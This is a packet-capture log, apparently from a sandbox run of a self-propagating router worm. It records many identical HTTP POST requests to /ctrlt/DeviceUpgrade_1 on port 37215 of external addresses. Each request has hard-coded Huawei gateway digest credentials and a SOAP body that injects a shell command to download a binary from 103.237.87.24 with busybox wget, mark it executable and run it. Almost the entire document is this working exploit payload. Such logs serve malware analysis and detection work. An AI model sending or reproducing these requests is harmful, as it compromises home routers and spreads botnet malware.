                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1997192.168.2.1358584197.115.144.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573503971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1998192.168.2.1347876197.149.142.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573539019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1999192.168.2.1359928197.119.226.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573539972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2000192.168.2.135507862.111.91.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573860884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2001192.168.2.1346138105.51.83.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573868990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2002192.168.2.134287841.194.102.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573889971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2003192.168.2.1337908216.189.96.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573903084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2004192.168.2.134821835.193.130.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573906898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2005192.168.2.133845241.155.121.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574408054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2006192.168.2.1346844157.109.37.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574421883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
